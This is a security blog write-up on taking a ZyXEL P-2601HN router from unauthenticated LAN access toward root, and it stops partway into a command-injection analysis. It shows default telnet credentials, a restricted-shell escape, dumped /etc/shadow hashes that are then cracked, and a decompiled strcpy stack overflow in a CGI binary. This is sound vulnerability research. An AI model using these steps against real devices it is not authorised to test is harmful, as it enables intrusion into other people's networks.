<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="generator" content="Hugo 0.92.2" />

  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="" />
  <meta property="og:url" content="http://cavefxa.com/posts/zyxel-p2601hn/" />
  <link rel="canonical" href="http://cavefxa.com/posts/zyxel-p2601hn/" /><link rel="alternate" type="application/atom+xml" href="http://cavefxa.com/index.xml" title="cavefxa: security research">

  <script type="application/ld+json">
  {
      "@context" : "http://schema.org",
      "@type" : "BlogPosting",
      "mainEntityOfPage": {
           "@type": "WebPage",
           "@id": "http:\/\/cavefxa.com\/"
      },
      "articleSection" : "posts",
      "name" : "ZyXEL P-2601HN - Unauthenticated to root!",
      "headline" : "ZyXEL P-2601HN - Unauthenticated to root!",
      "description" : "Preface In this blog post, I will be going through how I, along with a few of my friends, spent the previous sunday, hacking an old router, and getting a full exploit, that takes an attacker from unauthenticated LAN to root on the router. Hope you enjoy!\nGetting started Picking a target As with my last router target, this one was also picked up from a thrift store. I recall spending around 5$ on it, and that\u0026rsquo;s certainly worth a day of fun hacking.",
      "inLanguage" : "en-US",
      "author" : "",
      "creator" : "",
      "publisher": "",
      "accountablePerson" : "",
      "copyrightHolder" : "",
      "copyrightYear" : "2023",
      "datePublished": "2023-03-26 11:37:00 \u002b0100 \u002b0100",
      "dateModified" : "2023-03-26 11:37:00 \u002b0100 \u002b0100",
      "url" : "http:\/\/cavefxa.com\/posts\/zyxel-p2601hn\/",
      "keywords" : [  ]
  }
</script>
<title>ZyXEL P-2601HN - Unauthenticated to root!</title>
  <meta property="og:title" content="ZyXEL P-2601HN - Unauthenticated to root!" />
  <meta property="og:type" content="article" />
  <meta property="og:description" content="Preface In this blog post, I will be going through how I, along with a few of my friends, spent the previous sunday, hacking an old router, and getting a full exploit, that takes an attacker from unauthenticated LAN to root on the router. Hope you enjoy!
Getting started Picking a target As with my last router target, this one was also picked up from a thrift store. I recall spending around 5$ on it, and that&amp;rsquo;s certainly worth a day of fun hacking." />
  <meta name="description" content="Preface In this blog post, I will be going through how I, along with a few of my friends, spent the previous sunday, hacking an old router, and getting a full exploit, that takes an attacker from unauthenticated LAN to root on the router. Hope you enjoy!
Getting started Picking a target As with my last router target, this one was also picked up from a thrift store. I recall spending around 5$ on it, and that&amp;rsquo;s certainly worth a day of fun hacking." />
  <meta property="og:locale" content="en-us" /><meta property="og:image" content="" />
  

  
    <style>body{font-family:bree serif,sans-serif;-webkit-font-smoothing:antialiased;margin:0 20px}article{max-width:900px;margin-left:auto;margin-right:auto}a{color:#000;text-decoration:none}a:hover{font-weight:600;text-decoration:underline}.post-ads{margin:50px 0}.markdown-body{font-size:18px;max-width:100%}.markdown-body a{text-decoration:underline;text-decoration-color:#000}.markdown-body blockquote{margin:0;padding:0 1em;color:#57606a;border-left:.25em solid #d0d7de}.markdown-body pre{padding:16px;overflow:auto;border-radius:10px}pre{.l { color: #000000 !important; }}.markdown-body code{padding:.2em .4em;font-size:85%;color:#43494d;border-radius:6px}.highlight pre{background-color:#fff!important}.markdown-body pre>code{padding:0;font-size:100%;color:#171b1f;background-color:inherit;border:0}.Chinese .markdown-body{line-height:200%}.site-date-catalog{font-size:2rem}.header-title{font-size:2rem;font-weight:700;margin-top:32px;font-family:bungee shade,sans-serif}.header-title a{text-decoration:none}.header-subtitle{color:#666}.header-items{margin:10px 0}.header-item{margin:0 5px}.header-line{width:100%;border-width:2px;border-color:#482936;border-style:solid none none none}.lang-switch{font-weight:600}#posts-list{min-height:600px}.posts-line{font-size:1.2rem;margin:12px 0}.posts-categories{font-size:.8rem;margin:auto;text-align:center}.posts-category{padding:3px 0;border:#000 2px solid;border-radius:5px}.site-footer{margin-top:50px}.site-footer-item{margin-right:12px}.post-content img{max-width:100%;display:block;margin-right:auto;margin-top:12px}.post-header{margin-bottom:50px}.post-title{font-size:2rem;font-weight:600}.post-tags{display:inline;font-weight:600;padding:2px 5px;margin-right:6px;border:#000 2px solid;border-radius:5px}.post-date{font-weight:800;font-style:italic}.post-author{float:right;font-weight:600}.page-content{min-height:60%}.post-content{margin-bottom:50px}.post-content p{hyphens:auto;line-height:1.8;text-justify:ideographic;margin-bottom:1em}.related-content{border-width:3px;border-style:solid;border-color:#000;padding:0 10px;margin-bottom:50px;margin-top:100px}.related-content li{margin:5px 0}.taxonomy-term{font-size:3rem}.gallery-img{text-align:center}.gallery-img span{text-align:center}.gallery-img-desc{font-size:.8em;font-weight:800}#disqus_thread{position:relative}#disqus_thread:after{content:"";display:block;height:55px;width:100%;position:absolute;bottom:0;background:#fff}@media screen and (max-width:600px){.header-title,.header-subtitle,.header-items{text-align:center}.posts-line{font-size:16px}.markdown-body{font-size:16px}.post-title{font-size:2rem}.post-content p{letter-spacing:.05em}}@media screen and (max-width:48em){.posts-category{display:none}}</style>
  
  
    <style>.container,.container-fluid{margin-right:auto;margin-left:auto}.container-fluid{padding-right:2rem;padding-left:2rem}.row{box-sizing:border-box;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-flex:0;-ms-flex:0 1 auto;flex:initial;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-.5rem;margin-left:-.5rem}.row.reverse{-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.col.reverse{-webkit-box-orient:vertical;-webkit-box-direction:reverse;-ms-flex-direction:column-reverse;flex-direction:column-reverse}.col-xs,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-offset-0,.col-xs-offset-1,.col-xs-offset-10,.col-xs-offset-11,.col-xs-offset-12,.col-xs-offset-2,.col-xs-offset-3,.col-xs-offset-4,.col-xs-offset-5,.col-xs-offset-6,.col-xs-offset-7,.col-xs-offset-8,.col-xs-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-xs{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-xs-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-xs-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-xs-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-xs-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-xs-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-xs-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-xs-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-xs-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-xs-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-xs-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-xs-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-xs-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-xs-offset-0{margin-left:0}.col-xs-offset-1{margin-left:8.33333333%}.col-xs-offset-2{margin-left:16.66666667%}.col-xs-offset-3{margin-left:25%}.col-xs-offset-4{margin-left:33.33333333%}.col-xs-offset-5{margin-left:41.66666667%}.col-xs-offset-6{margin-left:50%}.col-xs-offset-7{margin-left:58.33333333%}.col-xs-offset-8{margin-left:66.66666667%}.col-xs-offset-9{margin-left:75%}.col-xs-offset-10{margin-left:83.33333333%}.col-xs-offset-11{margin-left:91.66666667%}.start-xs{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-xs{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-xs{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-xs{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-xs{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-xs{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-xs{-ms-flex-pack:distribute;justify-content:space-around}.between-xs{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-xs{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-xs{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}@media only screen and (min-width:48em){.container{width:49rem}.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-offset-0,.col-sm-offset-1,.col-sm-offset-10,.col-sm-offset-11,.col-sm-offset-12,.col-sm-offset-2,.col-sm-offset-3,.col-sm-offset-4,.col-sm-offset-5,.col-sm-offset-6,.col-sm-offset-7,.col-sm-offset-8,.col-sm-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-sm{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-sm-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-sm-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-sm-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-sm-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-sm-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-sm-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-sm-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-sm-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-sm-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-sm-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-sm-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-sm-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-sm-offset-0{margin-left:0}.col-sm-offset-1{margin-left:8.33333333%}.col-sm-offset-2{margin-left:16.66666667%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-4{margin-left:33.33333333%}.col-sm-offset-5{margin-left:41.66666667%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-7{margin-left:58.33333333%}.col-sm-offset-8{margin-left:66.66666667%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-10{margin-left:83.33333333%}.col-sm-offset-11{margin-left:91.66666667%}.start-sm{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-sm{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-sm{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-sm{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-sm{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-sm{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-sm{-ms-flex-pack:distribute;justify-content:space-around}.between-sm{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-sm{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-sm{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:64em){.container{width:65rem}.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-offset-0,.col-md-offset-1,.col-md-offset-10,.col-md-offset-11,.col-md-offset-12,.col-md-offset-2,.col-md-offset-3,.col-md-offset-4,.col-md-offset-5,.col-md-offset-6,.col-md-offset-7,.col-md-offset-8,.col-md-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-md{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-md-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-md-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-md-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-md-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-md-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-md-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-md-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-md-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-md-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-md-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-md-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-md-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-md-offset-0{margin-left:0}.col-md-offset-1{margin-left:8.33333333%}.col-md-offset-2{margin-left:16.66666667%}.col-md-offset-3{margin-left:25%}.col-md-offset-4{margin-left:33.33333333%}.col-md-offset-5{margin-left:41.66666667%}.col-md-offset-6{margin-left:50%}.col-md-offset-7{margin-left:58.33333333%}.col-md-offset-8{margin-left:66.66666667%}.col-md-offset-9{margin-left:75%}.col-md-offset-10{margin-left:83.33333333%}.col-md-offset-11{margin-left:91.66666667%}.start-md{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-md{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-md{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-md{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-md{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-md{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-md{-ms-flex-pack:distribute;justify-content:space-around}.between-md{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-md{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-md{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:75em){.container{width:76rem}.col-lg,.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-offset-0,.col-lg-offset-1,.col-lg-offset-10,.col-lg-offset-11,.col-lg-offset-12,.col-lg-offset-2,.col-lg-offset-3,.col-lg-offset-4,.col-lg-offset-5,.col-lg-offset-6,.col-lg-offset-7,.col-lg-offset-8,.col-lg-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-lg{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-lg-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-lg-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-lg-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-lg-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-lg-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-lg-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-lg-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-lg-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-lg-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-lg-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-lg-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-lg-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-lg-offset-0{margin-left:0}.col-lg-offset-1{margin-left:8.33333333%}.col-lg-offset-2{margin-left:16.66666667%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-4{margin-left:33.33333333%}.col-lg-offset-5{margin-left:41.66666667%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-7{margin-left:58.33333333%}.col-lg-offset-8{margin-left:66.66666667%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-10{margin-left:83.33333333%}.col-lg-offset-11{margin-left:91.66666667%}.start-lg{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-lg{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-lg{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-lg{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-lg{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-lg{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-lg{-ms-flex-pack:distribute;justify-content:space-around}.between-lg{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-lg{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-lg{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}</style>
  

  

  <link href="/index.xml" rel="alternate" type="application/rss+xml"
    title="cavefxa: security research">
  
  <link rel="preconnect" href="https://fonts.gstatic.com">
  <link href="https://fonts.googleapis.com/css?family=Bree+Serif|Bungee+Shade" rel="stylesheet">
  
  

  
  
</head>


<body>
  <article class="post " id="article">
    <div class="row">
      <div class="col-xs-12">
        <div class="site-header">
          
<header>
  <div class="header-title">
    <a href="/"
      >cavefxa</a
    >
  </div>
  <div class="header-subtitle"></div>
</header>
<div class="row end-md center-xs header-items">
  
  <div class="header-item">
    <a href="/about" target="_blank">About Me</a>
  </div>
  
</div>
<div class="row end-xs">
   
</div>
<div class="header-line"></div>

        </div>
        <header class="post-header">
          <h1 class="post-title">ZyXEL P-2601HN - Unauthenticated to root!</h1>
          
          <div class="row post-desc">
            <div class="col-xs-6">
              
              <time class="post-date" datetime="2023-03-26 11:37:00 &#43;0100">
                26 Mar 2023
              </time>
              
            </div>
            <div class="col-xs-6">
              
            </div>
          </div>
          
        </header>

        <div class="post-content markdown-body">
          
          <h1 id="preface">Preface</h1>
<p>In this blog post, I will be going through how I, along with a few of my friends, spent the previous sunday, hacking an old router, and getting a full exploit, that takes an attacker from unauthenticated LAN to root on the router. Hope you enjoy!</p>
<h1 id="getting-started">Getting started</h1>
<h3 id="picking-a-target">Picking a target</h3>
<p>As with my last router target, this one was also picked up from a thrift store. I recall spending around 5$ on it, and that&rsquo;s certainly worth a day of fun hacking.</p>
<h3 id="taking-it-apart">Taking it apart</h3>
<p><img src="/pictures/p2601hn.png" alt="router-hardware"></p>
<p>Initially I wanted to do a lot of hardware hacking on this router, to dump the firmware on it. However we ended up going another route. It&rsquo;s however still cool to see the circuitry of these devices:)</p>
<h3 id="initial-reconnaisance">Initial reconnaisance</h3>
<p>We started by having a look at the web interface, and getting a succesful log-in. During our initial internet searching, we found the manual which specified, that the default username, and password would be <code>admin:1234</code>, this didn&rsquo;t work out the gate. Resetting the router, and boom. We get a nice user interface, with a lovely network diagram. We also performed the obligatory <code>nmap</code> scan, and during this scan we found out that it had telnet open! This was fantastic, trying the default admin creds <code>admin:1234</code> on telnet, gave us a shell (kind of)!</p>
<h3 id="breaking-free">Breaking free</h3>
<p>Now we were in a <code>ZySH&gt;</code> terminal, which was very restricted. We tried <code>help</code> etc. but nothing seemed to do what we expected. After trying a few things, we saw that <code>h</code> gave the history of our commands, and following in this train of thought, we tried a bunch of other one letter commands. Most letters gave a message along the lines of <code>Command doesn't exist</code> while two letters gave another message along the lines of <code>Please specify the option</code>. During this I ended up finding that if you just send <code>n s</code>, you get a proper busybox shell. This was more a stroke of luck, than anything else, but now we have a proper shell!</p>
<h1 id="now-what">Now what?</h1>
<h3 id="finding-the-pots-of-gold">Finding the pots of gold</h3>
<p>We now have a shell, but we would instead like to find some information about the system, that we could use to get a proper exploit, not something, that requires us to be lucky, have telnet on, and have default credentials sat. Looking around on the system we found a few interesting things. For starters in the <code>/home/</code> folder we saw entries for <code>Kundservice</code>, <code>admin</code>, <code>shares</code>, <code>supervisor</code>, and <code>user</code>. <code>Kundservice</code> is a swedish word for <code>Customer Service</code>, <code>Kung</code> a word for <code>King</code>.</p>
<p>Another thing we noticed is that we could read <code>/etc/shadow</code>, which had the contents:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-fallback" data-lang="fallback">root:$1$6qJ7bjme$IYpiE3C1vbikymriqIAW81:13013:0:99999:7:::
lp:*:13013:0:99999:7:::
nobody:*:13013:0:99999:7:::
admin:$1$vPvofv/u$7BmToWYY9esic0v54FFbR/:13013:0:99999:7:::
user:$1$$iC.dUsGpxNNJGeOm1dFio/:13013:0:99999:7:::
supervisor:$1$QsMQ44HY$.VcW9Y2tY6EBLoIB4krrb.:13013:0:99999:7:::
</code></pre></div><p>Running john on these hashes with <code>rockyou.txt</code> gave a hit on both admin and user, with the password 1234. Running hashcat with a bruteforce attack to crack root, overnight, also yielded nothing. Sadly we couldn&rsquo;t get root this easily. We also tried finding binaries that were running with SUID, to see if we could privilege escalate from user to root. <code>find / -perm -u=s -type f 2&gt;/dev/null</code>, to be fair, there&rsquo;s probably a lot of ways to privilege escalate, but none that we thought were fun (Like exploiting dirty cow, since it&rsquo;s an older router). What I found really interesting were the two binaries <code>zytr069cmd</code>, and <code>zyDeviceID</code>. Surface level reversing of these two binaries however, seemed to indicate, that these were not at all suitable targets, and barely even seemed to function properly.</p>
<p>Another thing that sprung out in my eyes, was the &ldquo;password&rdquo; in some of the users config files. It said:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-fallback" data-lang="fallback">&lt;ConnectionRequestPassword PARAMETER=&#34;configured&#34;
TYPE=&#34;string&#34; LENGTH=&#34;256&#34;&gt;cpeP4ss!&lt;/ConnectionRequestPassword&gt;
</code></pre></div><p>We never found out what this was used for, but it seems like it could be useful.</p>
<h3 id="extracting-source-code">Extracting source code</h3>
<p>We found out that through playing with the web interface, that it was consequently refering to .cgi files. Searching for these gave a lot of hits, and suddenly we had source for all the websites - written in C. Surely that can&rsquo;t go wrong?</p>
<p>Now let&rsquo;s take a bit of a sidetrack, and try to understand properly how a .cgi file works. <a href="https://en.wikipedia.org/wiki/Common_Gateway_Interface">CGI</a> stands for Common Gateway Interface, and is an interface, which allows executing external programs, typically to process user requests. That is, if we send a GET or POST request to a server, it might call some CGI binary, which processes our request, and for example, might determine if we&rsquo;re admin or not. This is pretty neat, and all, but how does it pass the request parameters to these external programs? For a GET request, the parameters (often sent in the URL i.e. <code>http://URL:PORT/example.cgi?favorite_word=deadbeef&amp;has_been_called=1</code>), will be passed through the <code>QUERY_STRING</code>, environment variable. There&rsquo;s also the <code>PATH_INFO</code> variable, which contains info about what URL has been referred. A program might then create files on the system, access a local database, external database or use this information, how it sees fit. For example a registering feature in a CGI context, might take your username and password, and then add them to a database. Below a drawing can be seen representing this interface:</p>
<p><img src="/pictures/cgi-draw.png" alt="cgi-interface"></p>
<p>Sidetrack now done, armed with new knowledge, we&rsquo;re ready to continue. We found all the CGI files being used on the server on the telnet connection, in the folder <code>/usr/share/web</code>.</p>
<h1 id="finding-bugs-everywhere">Finding bugs everywhere</h1>
<h3 id="using-what-weve-learnt">Using what we&rsquo;ve learnt</h3>
<p>Now we began analyzing these CGI binaries. We started by noting that they were <code>ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</code>. So we were dealing with 32-bit big endian executables written in C. I wrote a small bash script to extract functions from the different CGI binaries, as there were many.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-bash" data-lang="bash"><span style="color:#888;font-style:italic">#!/bin/bash
</span><span style="color:#888;font-style:italic"></span>
<span style="color:#888;font-style:italic"># Store directory of .cgi files</span>
<span style="color:#000">DIR</span>=<span style="color:#000">$1</span>

<span style="color:#888;font-style:italic"># Create output file &#34;results.txt&#34;</span>
touch results.txt

<span style="color:#888;font-style:italic"># Run rabin2 command on each .cgi file in the directory </span>
<span style="color:#00f">for</span> file in <span style="color:#000">$DIR</span>/*.cgi; <span style="color:#00f">do</span>
	<span style="color:#000">echo</span> <span style="color:#5a2">&#34;File: </span><span style="color:#000">$file</span><span style="color:#5a2">&#34;</span> &gt;&gt; results.txt
	rabin2 -i <span style="color:#000">$file</span> &gt;&gt; results.txt
	<span style="color:#000">echo</span> -e <span style="color:#5a2">&#34;\n\n&#34;</span> &gt;&gt; results.txt
<span style="color:#00f">done</span>
</code></pre></div><p>Quickly we see a lot of interesting files, let&rsquo;s take an example:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-fallback" data-lang="fallback">
File: ./wlan_wpsinfo.cgi
[Imports]
nth vaddr      bind   type   lib name
―――――――――――――――――――――――――――――――――――――
3   0x00400ce0 WEAK   FUNC       __deregister_frame_info
6   0x00400cf0 GLOBAL FUNC       getenv
8   0x00400d00 GLOBAL FUNC       system
9   0x00400d10 GLOBAL FUNC       templateSetFile
10  0x00000000 WEAK   NOTYPE     _Jv_RegisterClasses
11  0x00400d20 GLOBAL FUNC       sleep
15  0x00400d30 WEAK   FUNC       __register_frame_info
19  0x00400d40 GLOBAL FUNC       __uClibc_main
20  0x00400d50 GLOBAL FUNC       templatePrint
22  0x00400d60 GLOBAL FUNC       access
25  0x00400d70 GLOBAL FUNC       templateFreeMem
</code></pre></div><p>This file uses <code>getenv</code>, which means we might be able to interact with it through a request we send, and furthermore it also calls the dangerous <code>system</code> method, which might allow for executing commands on the underlying system. Let&rsquo;s take a look at one of the binaries using this <code>getenv</code> functionality. We can look at the <code>wpsinfo</code> from the example above.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-c" data-lang="c"><span style="color:#00f">int32_t</span> <span style="color:#000">cgiMain</span>() {
    <span style="color:#00f">int32_t</span> <span style="color:#000">var_110</span> = <span style="color:#3af">0</span>
    <span style="color:#000">checkTimeOut</span>()
    <span style="color:#00f">char</span> <span style="color:#000">stack_buffer</span> 
    <span style="color:#00f">if</span> (<span style="color:#000">getenv</span>(<span style="color:#5a2">&#34;QUERY_STRING&#34;</span>) != <span style="color:#3af">0</span>)
        <span style="color:#000">strcpy</span>(&amp;<span style="color:#000">stack_buffer</span>, <span style="color:#000">getenv</span>(<span style="color:#5a2">&#34;QUERY_STRING&#34;</span>))
        ... }
</code></pre></div><p>We can see we have a direct overflow here, this is due to the fact that <code>strcpy</code> does no bounds checking. Recall the sidetrack from before, we have control over the QUERY_STRING, if we send a GET request to this endpoint. This is one of many vulnerabilities of this type. Running <code>checksec</code> to check security mitigations on the binary we&rsquo;re happy to see, that there are none.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-fallback" data-lang="fallback">Arch:     mips-32-big
RELRO:    No RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x400000)
RWX:      Has RWX segments
</code></pre></div><p>We could perhaps use this for a buffer overflow, and then do return-oriented programming on the router, and run code like this. Cool!</p>
<h3 id="looking-further-command-injection">Looking further, command injection</h3>
<p>There&rsquo;s so much wrong with this code, so we continued to look on. If it used <code>system</code>, we might be lucky to get a straight up command injection. After some time investigating these files, we see that we have the following interesting code:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:2;-o-tab-size:2;tab-size:2"><code class="language-c" data-lang="c"><span style="color:#888;font-style:italic"># qos_queue.cgi
</span><span style="color:#888;font-style:italic"></span>
<span style="color:#000">templateSetVar</span>(<span style="color:#5a2">&#34;QueueNumber&#34;</span>, &amp;<span style="color:#000">qname</span>)
<span style="color:#000">templateSetVar</span>(<span style="color:#5a2">&#34;EnableNumber&#34;</span>, &amp;<span style="color:#000">qname</span>)
<span style="color:#000">templateSetVar</span>(<span style="color:#5a2">&#34;WebQueueNumber&#34;</span>, &amp;<span style="color:#000">qname</span>)
<span style="color:#00f">void</span>* <span style="color:#00f">const</span> <span style="color:#000">var_10_1</span>
